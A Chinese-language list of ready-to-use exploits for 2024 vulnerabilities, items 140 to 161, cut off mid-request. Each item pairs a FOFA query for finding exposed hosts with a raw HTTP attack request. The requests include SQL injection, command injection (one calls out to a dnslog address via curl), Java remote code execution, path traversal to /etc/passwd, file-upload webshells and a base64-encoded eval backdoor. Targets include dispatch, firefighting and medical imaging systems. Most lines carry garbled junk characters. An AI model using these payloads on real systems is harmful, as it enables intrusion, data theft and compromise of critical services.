GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
: W; h0 |$ c& ~5 pHost: x.x.x.x. n! ~9 ^/ L; {. L, z" g @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0% y: g& p. d; B9 }; g6 ^' C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 c% Z8 W) ?+ V/ V3 k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- O4 Z/ I& B7 |- b9 R- DAccept-Encoding: gzip, deflate, br) [/ M7 e: l2 G) [, o9 }1 r
Connection: close+ p; f$ C' t1 |7 v- I. {
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk1 A: j0 X3 G+ H" o [. T
Upgrade-Insecure-Requests: 1, c: `; V3 N& N4 ]
- o. M; L7 [- v; ] n
7 q7 b2 V7 ]! S4 {4 Z0 M6 A
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
0 N1 w2 N% ]3 j5 D" v8 }! ^, pCVE-2024-2566/ d0 h3 y8 }1 B1 h3 x
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
6 I1 x* K. C. M2 X5 ~; f$ tGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.1
+ ?+ d+ t+ _1 q& z rHost: x.x.x.x5 H- V9 T5 H/ Q' k8 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! @: o6 w: X- [- {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# z* V' ^0 P/ Q+ v; UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& E' O+ [& d1 z; D' ^
Accept-Encoding: gzip, deflate, br) ]0 E. \4 s; o' P1 p6 }. h: l
Connection: close: s3 w, e5 n! `7 P! d
Cookie: authcode=h8g9
. n7 d+ e6 D; `: H- Y' R. S) ~Upgrade-Insecure-Requests: 1: x/ t" p2 O& G: M
) ^# W1 W8 r$ Q: j
: L, R9 r$ A' ?+ K# C$ w
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入5 q3 T6 X8 W" D* M* A1 Z
FOFA:body="指挥调度管理平台"
! D W% [4 i5 e5 z6 `( RPOST /app/ext/ajax_users.php HTTP/1.1
! X5 S' ^# |- N% yHost: your-ip. A, U8 L \6 A3 Z3 S% O
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
# t8 P8 _1 \1 C8 t/ [; |Content-Type: application/x-www-form-urlencoded% ]7 ^# P& Y& q4 ?; j/ i; u& g) w
- @" i: u1 c o, R; G. |# j9 [) Y
7 d9 U; D4 M! s3 r# Xdep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
1 l; r m( b2 T' [$ X& [: a3 ?% o; h4 R
$ s% E$ }; w$ a& |2 S142. CMSV6车辆监控平台系统中存在弱密码
; \, A/ V) N+ q C( J ^CVE-2024-296662 F `2 W# u. I
FOFA:body="/808gps/"
. {7 t: N' G5 L: A8 t! E3 s. zadmin/admin
. O0 U4 D- A7 ~4 y) i143. Netis WF2780 v2.1.40144 远程命令执行
+ t% r w$ `1 O2 L6 R. HCVE-2024-25850* ~4 f0 L6 [3 [+ L7 _% w3 ~4 h
FOFA:title='AP setup' && header='netis'0 {* m! K. A9 u7 ^( V! r
PAYLOAD
# H) b; B) F/ l$ J# Q: j- N; Q0 ]' B9 ?
144. D-Link nas_sharing.cgi 命令注入2 j; d* S8 G4 R, _/ q N
FOFA:app="D_Link-DNS-ShareCenter"- L" l1 B' N, S; ~: L8 e
system参数用于传要执行的命令3 V/ Q* r& W- M: g% J
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1) v' @& E1 O' Z8 H' s( O
Host: x.x.x.x" R8 S, v0 t* Z# h" w. \6 }
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
, g* t+ p; X6 HConnection: close3 @9 P2 O" j6 }" K% ]# e
Accept: */*
" e3 j i1 u, i j5 H, uAccept-Language: en
9 v/ G& U; r/ K, I* WAccept-Encoding: gzip5 ?0 r f$ n. A. z9 X' B
) G1 f8 f+ q, y8 K6 r+ B* Z5 T
7 T- W* S/ ]6 {/ z E& N145. Palo Alto Networks PAN-OS GlobalProtect 命令注入9 W4 o1 v& U, i0 z8 V
CVE-2024-3400
2 c8 f' T! e) }, WFOFA:icon_hash="-631559155"
- u* O. n; _2 [7 R9 { TGET /global-protect/login.esp HTTP/1.1
# |' |; p3 w* }+ U* `+ LHost: 192.168.30.112:10059 u; y" X" W: o$ S" u$ X, b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
% q5 Z) X% j( K, `5 J0 q/ f' pConnection: close
1 ~; v/ j2 |2 T) SCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
; F* u/ t1 U3 c1 }* L3 F) S+ rAccept-Encoding: gzip
* T, E$ t* r! w% v( J% A* Q& p
/ m( B6 d5 q* f# B# k8 F) y; h H& [9 j8 \6 C, Q
146. MajorDoMo thumb.php 未授权远程代码执行 `+ l/ z8 l5 P: N% Z! _
CNVD-2024-021754 |5 ~' v& E5 q, }2 r/ h3 ]/ d# U
FOFA:app="MajordomoSL"+ B) x% T* }" m! p7 {
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
2 ~ k, G- Z$ }5 P OHost: x.x.x.x" v( q8 Z% |! Q! a( s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
' A5 S: x0 \" K" B+ L+ S* n$ yAccept-Charset: utf-8
! r) m# M4 u/ v% D5 N4 zAccept-Encoding: gzip, deflate' v# g7 |) F: Y5 ?0 b8 c8 f, P, d
Connection: close
% \$ E* {/ H ~) [5 f0 n0 i( g
' g; a: I* ?3 I# f; S* [, e
% r) @" \% @3 q' s2 x8 Y) ^147. RaidenMAILD邮件服务器v.4.9.4-路径遍历* M. x0 ~7 _# o" z
CVE-2024-32399/ `2 X! _% T3 |
FOFA:body="RaidenMAILD"
, Y, K' a" ?4 o$ p$ NGET /webeditor/../../../windows/win.ini HTTP/1.1
; W/ b4 `5 E( T1 z: Y5 m% mHost: 127.0.0.1:818 f3 ]$ J5 d. Z: k' o# s
Cache-Control: max-age=0
( Q* `( F! z5 aConnection: close+ Z; X& G4 g( P8 i
& V+ V: y1 ^& V% b8 d+ s1 z7 c, A) c, p3 ?7 V" T. M3 S
148. CrushFTP 认证绕过模板注入) [6 Z( ~& e# b* S
CVE-2024-4040
7 i* U C( f+ j# i( B6 x. E# K4 [. mFOFA:body="CrushFTP"
/ P3 I5 G8 W2 o+ A) m5 u1 LPAYLOAD7 K8 H: C& c m" w3 c
6 [& S8 t& L1 I Z149. AJ-Report开源数据大屏存在远程命令执行
, H! j+ s. y$ H% JFOFA:title="AJ-Report"
( ?% S; R. {' S: d7 t/ a
6 c! ]2 q2 h3 F+ N( \1 qPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
3 l* D* P* ]7 c5 Z# i( x: {+ cHost: x.x.x.x2 |0 b% r( x2 M& Y& k6 t+ Q2 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
' i! _" T' K( J. y( e' y: N" r+ ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ N1 T) {5 A$ t% m+ pAccept-Encoding: gzip, deflate, br, T% f7 W- E* v& E
Accept-Language: zh-CN,zh;q=0.94 g6 V* R4 c8 z' C7 b
Content-Type: application/json;charset=UTF-8
f# W" I8 z$ Q$ ]5 ^Connection: close$ A2 h; l9 @+ X& @. O, i
' b; E* Z; \" X$ f" {6 \. l, {$ X{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
/ q5 T4 `* v1 A* ]% E7 \0 E- o
- p2 Z: T1 ^% I, m150. AJ-Report 1.4.0 认证绕过与远程代码执行
0 Z! s9 k, U6 c! }. a# ]- GFOFA:title="AJ-Report": U8 f8 x+ [+ P; D
POST /dataSetParam/verification;swagger-ui/ HTTP/1.16 C7 M. x" r6 G1 G9 N
Host: x.x.x.x3 C3 r9 a2 u4 I7 f ?% M$ R( j/ K6 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 ]: I9 I3 Q4 P! c" }- \0 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- f$ ?7 }9 ]7 t/ S$ L
Accept-Encoding: gzip, deflate, br: m \. C& ^2 Z/ s8 c! V" U
Accept-Language: zh-CN,zh;q=0.90 b1 |# m2 d* S( A/ P
Content-Type: application/json;charset=UTF-8
3 {7 h7 Z2 y+ I) T2 ~Connection: close
. S4 t4 O8 O& c0 ~Content-Length: 339
" z6 V; l& }# Z) L6 I% V X1 b9 I0 `1 Y; U7 H- U
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}5 T' n% D. \; ^
8 D! i; t& M& ?/ H) P% k/ u
) |3 A, ]2 Q z. V( O151. AJ-Report 1.4.1 pageList sql注入3 p+ w9 J, S k1 l2 y0 x2 |
FOFA:title="AJ-Report"
9 b' R( ^3 S# R* iGET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1- ^/ t. N4 z, Q* A4 J
Host: x.x.x.x
1 t+ t. A0 Q- M C, _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" W# {! q( f3 d
Connection: close
^+ C. Q/ y2 q$ x$ v" jAccept-Encoding: gzip
& @( B3 P0 \; {8 w C# e
" i% d9 k' z, R" d1 C; y
+ n# ^4 T' d+ |5 b( w; i152. Progress Kemp LoadMaster 远程命令执行
/ d( O' D; }3 yCVE-2024-1212- f. ]9 [3 \) ~
LoadMaster <= 7.2.59.2 (GA)( `( N0 J$ y+ ]7 y# V
LoadMaster<=7.2.54.8 (LTSF)
% G, c! B$ s1 Q& wLoadMaster <= 7.2.48.10 (LTS)
r% y. b, D$ Z# d% oFOFA:body="LoadMaster"
9 T# \+ D$ N/ _! e' \JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码
8 `9 V) t2 o! r$ @5 o/ PGET /access/set?param=enableapi&value=1 HTTP/1.1
' F' ^3 T) @, V$ K6 _* ZHost: x.x.x.x. } s5 H& z9 }- o) o* o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
8 i* ~5 M2 R" W" `0 L+ x5 l3 H8 u) MConnection: close5 v6 @; o! e% f- \
Accept: */*! ?2 ^; Q/ c: V6 y' f ?+ F
Accept-Language: en( [1 w6 f! z7 @' v
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
% j* C7 P0 A5 N, G/ \# v. k& @% kAccept-Encoding: gzip, ^: I4 Q& D0 _8 ^, a
+ R' g1 q |# s/ h4 g: Y4 \& i9 |2 ?1 u9 b W2 J$ C
153. gradio任意文件读取
K5 S: u7 K5 L; P5 W: D, {7 b) qCVE-2024-1561FOFA:body="__gradio_mode__"
% [1 g# l# W' j( {7 f第一步,请求/config文件获取componets的id
! r# b- ~" ~, U( b a [4 ^http://x.x.x.x/config6 ]# Y; l/ G' |# S- a- m
7 `6 A$ Y6 o0 s
" z+ c. Y' O0 F5 M
第二步,将/etc/passwd的内容写入到一个临时文件
3 @, T2 k: D: b, J, x QPOST /component_server HTTP/1.1
' ~5 }6 a4 U4 e2 `' O+ a3 v) m" _3 I! cHost: x.x.x.x
$ V- H7 p x: w9 s8 h Z$ i RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
1 s5 \8 d+ P: e- h7 ZConnection: close# S7 ]' k# c7 a
Content-Length: 115
& E9 K. ]+ q) @# @' X8 ?: iContent-Type: application/json+ X5 B; S3 w- v. j$ r, H, s/ ^' z
Accept-Encoding: gzip: _; B3 f* U6 M% [; P$ @3 Y, c- g
P5 p z# S: ~
{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}. X2 A' b' ]. M4 z0 ^
* f$ }' y/ x1 ?7 e( o
, C2 w1 G1 W% J第三步访问# T u( U9 F& H& p- k
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd
8 ?' I/ V* L7 o9 C' w+ W
4 V5 |: f( h; c& }! P* }
: X1 r# n* g/ R4 u7 y154. 天维尔消防救援作战调度平台 SQL注入
$ e3 H1 V3 Y: e5 _1 GCVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
, @+ ~& F* m& G! ~, BPOST /twms-service-mfs/mfsNotice/page HTTP/1.1
. \, F \" u4 o( ^# |& ^" k/ eHost: x.x.x.x4 C$ e( R6 Q. V
Content-Length: 106
+ | G$ G. H) FCache-Control: max-age=0! y7 x- U8 C4 e, B* Q! d4 T
Upgrade-Insecure-Requests: 1# F5 m# h5 l; o, p* F: h. e" R% G
Origin: http://x.x.x.x
9 |! p- X, P- h5 @Content-Type: application/json
; p0 v3 @% a$ y# @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36. C8 w" f9 k% n& K) m% u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ I5 ]% s9 Q4 W+ T2 d8 T
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
$ a, F1 I! J5 cAccept-Encoding: gzip, deflate+ L2 j+ m% `0 S; R, y6 i
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7) k3 g: z. ~' a8 N6 H% S
Connection: close5 [4 ~+ h* l7 `$ p# ~
' v' L8 @- n' F# T0 N( n$ _{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
' ]0 S5 i& O& `% j# W* [1 ~$ b: M( q7 Y4 A5 J/ p) u' @; R5 l' b
0 m& C6 ~9 O2 Z' Z$ L" @4 @' E. e155. 六零导航页 file.php 任意文件上传8 k+ W3 k7 O! h% M0 } A* F" M7 w
CVE-2024-34982/ N4 D" e# L) ?% A8 N- [* t7 D& A
FOFA:title=="上网导航 - LyLme Spage"4 u& d- Q8 R3 X$ h$ a5 ~
POST /include/file.php HTTP/1.1& w. v6 x8 s# g6 @
Host: x.x.x.x
, E; n. r9 k3 _; z b3 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0) n$ G9 s5 x9 e/ C9 l4 m
Connection: close
6 L( V! x0 Z& GContent-Length: 232
( S U. O+ F9 T AAccept: application/json, text/javascript, */*; q=0.01* b+ y" t" C2 |5 J, @
Accept-Encoding: gzip, deflate, br. C7 O7 g2 L1 T( a; P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 j3 k: Y( p1 j! |& p* l
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
2 h3 f1 w& R9 ?6 w) s. s& LX-Requested-With: XMLHttpRequest0 E- x& U2 V3 n2 q7 O% k* e- K
; u/ y# L5 {9 o" ~
-----------------------------qttl7vemrsold314zg0f
( j; z( X! M: P0 w" T* M GContent-Disposition: form-data; name="file"; filename="test.php"$ y% T6 J5 _6 s( i' G# y9 X
Content-Type: image/png& D, E @) @7 p2 [! r4 l/ o
( p, t& W" k6 p( j8 K% w8 L
<?php phpinfo();unlink(__FILE__);?>
/ V y. p5 h* J0 k-----------------------------qttl7vemrsold314zg0f--3 ^# V. Z) |: C* j2 Y, j/ `
; w1 q5 S: e- u4 }/ V3 u7 [" s6 `4 k& a( C
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php; w- X7 D* k: Z
$ l: z2 _$ |% r. `6 G5 V6 ?
156. TBK DVR-4104/DVR-4216 操作系统命令注入
$ i+ Y, s1 b0 H- o- DCVE-2024-3721
# l; o p+ {/ g; G8 F0 v2 C# |FOFA:"Location: /login.rsp"7 K. h* n1 F0 L& p9 I& |3 G( p
·TBK DVR-4104# Q/ B. F/ x9 q7 w
·TBK DVR-4216
; w% v/ m9 h$ D ]curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"$ A& e+ N6 F; X) M* n; I( _- q
0 U+ D5 C5 G0 P9 t, j% }5 n/ ^* {: p0 N; x( o$ [- v% d. Q4 M
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1% @7 \9 K+ I* w
Host: x.x.x.x
0 O; p- o: l# v- T' MUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 T4 O5 q" L0 e7 E3 K% {Connection: close
' N* s0 A+ X5 \& n/ K. `- ?: X. IContent-Length: 0
8 i _+ l e+ \3 hCookie: uid=1, L7 J; a; a) r3 l( @
Accept-Encoding: gzip
% f7 o" v, ?3 `. v2 f. v% n
* B7 [) h% o6 \5 g& J
; g" j, X; U: U ^4 Y- T) t157. 美特CRM upload.jsp 任意文件上传
) ?1 n' G$ `. j( D) _CNVD-2023-06971
2 k* O) H/ g' A* RFOFA:body="/common/scripts/basic.js"
0 t8 |4 K; Y8 n5 P: C7 cPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1( m% k6 j; u9 v& i6 o' m+ ~
Host: x.x.x.x
* F) e; H- G* ^0 p' ^+ @( f) sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
6 y6 F4 d' \1 ~; rContent-Length: 709. _2 \% _: A/ e" x& J8 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: i# `- d; N: l8 ]9 l: E0 ~
Accept-Encoding: gzip, deflate& b( R) B9 F- P b7 v# ^: B
Accept-Language: zh-CN,zh;q=0.9
9 j: l: ^* _$ G6 J' u9 N: W- BCache-Control: max-age=0
* V" _' b+ \8 M r% \Connection: close
# L( k( U3 W7 G# FContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
& @* ~9 I9 E8 e( _; mUpgrade-Insecure-Requests: 1
1 v9 _1 g3 q/ u
$ ~9 P, |! ]+ B3 _------WebKitFormBoundary1imovELzPsfzp5dN
3 X/ O$ c$ V1 ]- \6 zContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
6 U) Z9 l! v/ k% Z. P/ xContent-Type: application/octet-stream0 P9 J4 t; Z4 z7 Q P9 [( ]
/ G% P2 J7 t( @! _nyhelxrutzwhrsvsrafb1 K. |4 \2 f! O+ n
------WebKitFormBoundary1imovELzPsfzp5dN- H# `4 Y0 J( N/ W
Content-Disposition: form-data; name="key"
S O. Y, @+ j, g; t" A1 w* c
null, s( X: }9 N) P5 \1 y; @9 g9 q3 F
------WebKitFormBoundary1imovELzPsfzp5dN
; L9 _ H5 A2 o# GContent-Disposition: form-data; name="form"' Z- ] Q5 c- r
+ {# e1 h8 d) s2 J* Tnull2 A& |7 F) |' n5 K
------WebKitFormBoundary1imovELzPsfzp5dN
" ?6 p- h" ~" Q5 ~8 }Content-Disposition: form-data; name="field"
/ K/ B2 L( ^; b$ I, [) Z9 J* _) M1 c$ k/ P& N
null- n+ t2 ^$ B' M9 ^
------WebKitFormBoundary1imovELzPsfzp5dN, u2 L+ e& u4 {! A5 q1 u
Content-Disposition: form-data; name="filetitile"
( J" k* O! Q# F+ f5 M7 V- k
( z, t( y) r N( r$ V7 a. Onull
. @2 G8 I1 j% ?/ j" U) X5 k( q------WebKitFormBoundary1imovELzPsfzp5dN
- T# I6 g5 X2 F7 MContent-Disposition: form-data; name="filefolder"
0 n9 N% m6 _' g& D: J$ L" ^) U: O3 B7 u9 W3 ^+ \( O
null
$ O4 ^7 Y! r8 {3 h |( Q \, T$ B8 e------WebKitFormBoundary1imovELzPsfzp5dN--/ Z, Y% _; g/ g: ~( j
/ |- `# @8 m: N
9 R8 H! w6 B# i/ O6 q$ N& Dhttp://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp5 e( H5 z4 b! Z" v F
' D! K6 R" h: o, y( _158. Mura-CMS-processAsyncObject存在SQL注入
! X8 V; J) o4 a# G% L0 }CVE-2024-326402 B4 @+ I+ E8 S. a9 a
FOFA:"Generator: Masa CMS"1 o' Y- |) h/ n) E) _
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
4 @4 g1 X/ f% N$ z3 w- e1 PHost: {{Hostname}}
8 |! e% {7 l; ]+ a zContent-Type: application/x-www-form-urlencoded
7 k3 Y( K- ^3 c) y% \. B- {, I
: C9 X' {4 Q$ w5 Wobject=displayregion&contenthistid=x\'&previewid=1
2 V" w7 ~: C$ r) ~' q; c$ F2 M$ n' O/ g
! T- _( g* V, Z# a. u159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
s/ j2 b/ ?8 Y) t3 ]. n4 F$ kFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
3 [* P! Q8 a6 Y' Z9 N! }4 d; nPOST /webservices/WebJobUpload.asmx HTTP/1.1, r- K: e8 t6 m" @& q4 i7 |4 m/ ^$ I8 ~
Host: x.x.x.x; N% a7 S9 @2 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36. S- E, _) l' |1 t2 Q$ u0 d5 v
Content-Length: 1080( G- H, x- H N6 Q
Accept-Encoding: gzip, deflate5 v9 t) y; w; @
Connection: close \( E5 s9 o5 h! J/ m! y, X7 R
Content-Type: text/xml; charset=utf-8
; ]4 z! H' v) i- \, eSoapaction: "http://rainier/jobUpload"
8 S0 d0 i& L- T4 g* H' ^5 N H& M1 b8 k
<?xml version="1.0" encoding="utf-8"?>4 u7 r5 r! N* C
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">" A2 q- w! Z+ n4 g, Z b
<soap:Body>: h5 m! d: _& p# q) s0 w6 e
<jobUpload xmlns="http://rainier">
0 d5 [+ F9 Z$ ^- z<vcode>1</vcode>
. z9 a) c: u# L2 ~9 Z<subFolder></subFolder>9 p! E! u0 Q. w
<fileName>abcrce.asmx</fileName>+ ^+ U. ~) ?$ B
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>9 Q; B8 {/ m5 l6 \ i
</jobUpload>
: M1 P7 F' j- L% m( P" a</soap:Body>; ?8 X* Z; Z# W/ i' U4 ~% |) q
</soap:Envelope>
! C& m; O8 n& P4 S1 O1 ` z- W$ D& u! [2 ~8 R0 x7 v! a
* T" C4 T: V! p* Y. Q8 n/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")2 n4 B# ~, |8 o
2 W0 }$ L: u( K; F
. T9 D" Z$ a2 ?1 q" Y! g& Y$ l160. Sonatype Nexus Repository 3目录遍历与文件读取3 W- }6 ]- J" Z% u7 [6 p8 B2 g
CVE-2024-4956. j) U) h7 y k
FOFA:title="Nexus Repository Manager"$ s- y2 K) ^* k, F
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
7 i" E' o% D dHost: x.x.x.x
" N6 d v9 S; B4 V/ X0 uUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
5 i7 m/ }4 \) k5 K- k9 yConnection: close' h3 Z) f" y) x) X) v. x
Accept: */*
0 |. S& b1 @% G' ?0 C) D E4 m! OAccept-Language: en. m" o; v. o1 _, j# I
Accept-Encoding: gzip
( P( n* l. b& I0 X' G
5 v& I3 ^* P/ h: S/ S- v/ ~" y; V& U/ Z+ ]+ ^: T- ~ U
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传( U4 |" j# p( y4 R
FOFA:body="/KT_Css/qd_defaul.css"4 T) c( G) f1 m# H+ c6 T& o- W6 D
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密+ g8 D% n/ @7 d! n: y* g
POST /Webservice.asmx HTTP/1.1
5 v/ e6 c# b% C `Host: x.x.x.x( U! M; P* S. j% Z4 K- ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
5 ?0 h. h0 n; Z; A" _3 nConnection: close
9 s" y5 X. M0 m9 {( O" ZContent-Length: 445
& h, x& X& A6 w; D. D$ }( u8 zContent-Type: text/xml3 B7 r# ]; V$ Q7 U% B
Accept-Encoding: gzip
6 x" X! D; M* u/ W0 {) j; o8 r$ D/ R: S) [, S8 V1 H2 k D) @
<?xml version="1.0" encoding="utf-8"?>
. n9 u8 r! u% R/ X f<soap:Envelope xmlns:xsi="' T6 h$ Z1 V0 c# [; v) P9 r' {$ w
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
! I' Q3 s' q: a' G, `xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">, ?/ z% C* n4 I \
<soap:Body>
! |- M! T6 S0 g$ q: j<UploadResume xmlns="http://tempuri.org/">7 N) m: e' b# y7 Z1 a; [2 x
<ip>1</ip>" H/ D: r2 m2 l) W6 x/ p
<fileName>../../../../dizxdell.aspx</fileName>
